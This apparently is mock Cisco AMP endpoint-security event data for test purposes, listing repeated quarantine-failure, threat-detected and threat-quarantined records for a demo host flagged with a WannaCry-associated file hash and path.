found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405203","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405202","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":563000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405200","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":439000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":407000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437900","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":610000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405205","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":563000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":439000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405203","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":407000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405202","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405200","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":251000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 